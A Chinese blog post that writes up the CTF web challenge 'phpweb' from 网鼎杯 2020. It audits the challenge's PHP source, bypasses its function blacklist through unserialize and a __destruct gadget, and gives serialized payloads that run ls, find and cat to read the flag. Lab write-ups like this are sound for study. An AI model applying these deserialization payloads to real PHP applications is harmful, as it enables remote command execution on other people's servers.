练[网鼎杯 2020 朱雀组]phpweb

最新推荐文章于 2024-07-27 14:07:25 发布
最新推荐文章于 2024-07-27 14:07:25 发布
阅读量113 收藏 1
点赞数 5
分类专栏: buuctf刷题 文章标签: web安全 笔记 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/133364354
版权

[网鼎杯 2020 朱雀组]phpweb

文章目录


在这里插入图片描述

掌握内容

file_get_contents文件读取函数,call_user_func($func,$p)命令执行函数使用,代码审计,反序列化利用,linux查找文件的命令

详细过程

  1. 访问网站,发现页面会隔一段时间弹出一段警告内容。查看页面源代码发现会经过input标签提交内容

image-20230927212049997

image-20230927212212245

  1. 选择抓包查看发现两个post参数,查看传参感觉像是进行date函数命令执行,难怪界面会弹出date()了。尝试修改参数内容,执行paylaod:func=system&p=ls,发现页面回显hacker。果然不会这么简单的就能执行命令执行函数

image-20230927212517137

image-20230927212525913

  1. 猜测命令执行函数多半都被过滤了,尝试文件读取的一些函数,发现file_get_contents常函数没被过滤。尝试读取flag没能成功。

image-20230927212655790

   <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
   function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>
  1. 接下来就要开始代码审计了,发现过滤的函数真够多的。查看源代码后发现可以分为三个部分,对三个部分进行分析
  2. 第一部分就是gettime函数,发现可以调用call_user_func($func, $p),该函数可以进行命令执行,参数$func代表函数名,参数$p代表函数的参数。接下来gettype()判断参数的类型,是字符串类型就返回结果
  function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
  1. 第二部分是Test类,发现有pfunc两个参数,而且调用该类还会执行__destruct()魔术方法,改魔术方法会调用gettime函数,而且进行反序列化的话参数还是可控的
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
  1. 第三部分是对传入的参数进行判断,如果传入的函数名有$disable_fun变量中的,就会返回haker,否则就调用gettime函数,而且参数也可控,只是这黑名单函数够多的,命令执行的函数都给过滤了应该
        $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
  1. 一看到有类存在,就不自觉想到反序列化,而且发现反序列化函数还没有被过滤,可以构建思路:黑名单过滤只是针对传参,但是可以执行反序列化函数,将类中的func变量赋值为存在在黑名单的命令执行函数system,给p赋值命令执行参数,即可通过析构魔术方法调用gettime函数,实现任意命令执行。根据思路构建序列化字符串,通过burp进行发送,成功回显了目录文件
<?php
 class Test {
     var $p = "ls";
     var $func = "system";
	 }
$flag=new Test();
echo serialize($flag);
?>
O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

image-20230927211551592

  1. 尝试查看根目录下文件,发现也没有flag文件,只好执行find命令,搜索flag文件名了,为了搜索内容过多,先尝试搜索以fla开头的文件,更改p变量的值,构建序列化字符串O:4:"Test":2:{s:1:"p";s:70:"find / -name fla* -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null";s:4:"func";s:6:"system";}。响应过程有点慢。发现可以文件/tmp/flagoefiu4r93

image-20230927213129219

  1. 再次修改p变量的值,使用cat命令查看该文件内容,发现就是flag,成功拿下

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

image-20230927213334252

关键paylaod

func=file_get_contents&p=index.php

<?php
 class Test {
     var $p = "ls";
     var $func = "system";
	 }
$flag=new Test();
echo serialize($flag);
?>
O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

O:4:"Test":2:{s:1:"p";s:70:"find / -name fla* -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null";s:4:"func";s:6:"system";}

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
生而逢时
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
网鼎2020-朱雀.rar
05-24
【网鼎2020-朱雀】是2020网鼎杯网络安全竞赛中朱雀的相关挑战资料,这个压缩包可能包含了该竞赛的Web类题目。网鼎杯是中国知名的网络安全技术大赛,旨在提升参赛者的网络安全技能,促进网络安全行业的健康发展...
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
Opera中国版(朱雀版) v12.02
11-05
Opera 是来自挪威的一个极为出色的网络浏览套件,具有速度快、节省系统资源、定制能力强、安全性高以及体积小等特点,目前已经是广受欢迎的浏览器之一。... 在中国用户浏览器使用习惯研究和社区反馈的基础上,我们对 ...
网络安全自学从入门到精通的制胜攻略!!!
最新发布
2301_77160226的博客
07-27 249
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
“微软蓝屏”事件引发的深度思考:网络安全与系统稳定性的挑战与应对
CWPIN21的博客
07-23 1346
近日,一次由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,不仅成为科技领域的热点新闻,更是一次对全球IT基础设施韧性与安全性的深刻检验。这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。面对如此大规模的系统中断,网络安全与系统稳定性的讨论再次被推上风口浪尖。如何构建更加稳固和安全的网络环境?
网络安全相关竞赛比赛
黑战士的博客
07-18 1292
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
OWASP ZAP:一款功能强大的开源Web安全扫描工具
Coder加油站的专栏
07-27 840
OWASP ZAP是一个功能强大的Web应用程序安全扫描工具,适用于各种开发、测试和生产环境。通过自动扫描、手动测试、被动扫描和主动扫描等多种功能,ZAP能够帮助用户全面评估Web应用程序的安全性。此外,ZAP还提供了强大的API、插件和扩展功能,可以与CI/CD流水线集成,自动化地进行安全测试
MongoDB学习笔记
weixin_55355282的博客
07-25 1076
文章记录了作者从对MongoDB数据库的初步了解到深入学习的全过程,包括对MongoDB的基本概念、CRUD操作以及高级特性的学习过程。同时,文章还介绍了使用mongoose这个DB对象建模工具来对MongoDB进行操作和管理的学习过程。文章总结了学习过程中遇到的问题和解决方案,对于初学者来说是一篇很好的参考资料。
dsp c6657 SYS/BIOS学习笔记
小pp的博客
07-25 246
SYS/BIOS是一种用于TI的DSP平台的嵌入式操作系统(RTOS)。
谷粒商城实战笔记-59-商品服务-API-品牌管理-使用逆向工程的前后端代码
epitomizelu的专栏
07-25 419
品牌管理的代码使用逆向工程生成的代码,再次基础上进行修改。小细节,使用逆向工程生成代码时,要注意分页导致只生成部分代码,可以调整每页显示的数据条数,一次把所有的数据都显示出来。把逆向工程中与品牌相关的两个代码文件是brand.vue和。拷贝到前端工程中。
谷粒商城实战笔记-62-商品服务-API-品牌管理-OSS整合测试
epitomizelu的专栏
07-25 1012
通过上述步骤,你可以在Java项目中轻松地整合阿里云OSS服务,实现文件的上传、下载等功能。阿里云OSS提供了丰富的API和工具,可以根据你的业务需求进一步定制和扩展。希望这篇博客能帮助你在Java项目中顺利整合阿里云OSS服务。如果有任何疑问或需要进一步的帮助,请随时提问!
谷粒商城实战笔记-63-商品服务-API-品牌管理-OSS获取服务端签名
epitomizelu的专栏
07-25 1090
因此,上传文件涉及到第三方服务阿里云OSS,以后还会有第三方短信服务等,为了统一管理第三方服务,创建一个专门的模块third-party。
《计算机网络》(学习笔记
qiqi_liuliu的博客
07-24 2000
网络(Network)由若干结点(Node)和连接这些结点的链路(Link)成多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,即互联网(互连网)。因此,互联网是"网络的网络(Network of Networks)"因特网(Internet)是世界上最大的互连网络(用TCP/IP)internet是通用名词,互连的网络都叫internet注:互连、自治、集合。在计算机内部或在相邻设备之间近距离传输时,可不经过调制就在信道上直接进行的传输方式称为基带传输。
谷粒商城实战笔记-61-商品服务-API-品牌管理-云存储开通与使用
epitomizelu的专栏
07-25 1002
文章目录一,图片云存储二,阿里云OSS1,OSS2,基于OSS的文件上传架构3,Java中使用OSS 一,图片云存储 这张图展示了文件存储的几种常见模式: 普通上传 分布式情况下的普通上传 使用自建服务器 云存储服务的情况 普通上传:在这种情况下,浏览器直接将文件上传给商品服务,然后由商品服务保存文件。这种方式简单明了,但是存在单点故障风险,因为所有文件都在同一台服务器上存储。 分布式情况下的普通上传:这是一种改进后的版本,多个商品服务共享同一个文件存储空间。然而,这种方案仍然需要自己维护文件
CSS学习笔记
ngczx的博客
07-23 654
CSS学习笔记
Mysql数据库笔记
m0_64346512的博客
07-25 721
mysql基础笔记
Live555源码阅读笔记:哈希表的实现(C++)
wkd_007的博客
07-24 871
👉本文介绍了Live555的哈希表实现,最后给出了使用例子,对于想了解哈希表实现或Live555源码的同学有一定的帮助。
[网鼎杯 2020 朱雀]phpweb
03-16
phpweb是一种基于PHP语言开发的Web应用程序框架,它提供了一系列的工具和函数库,使得开发者可以更加高效地构建Web应用程序。phpweb具有易于学习、易于使用、易于扩展等特点,因此在Web应用程序开发中得到了广泛的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值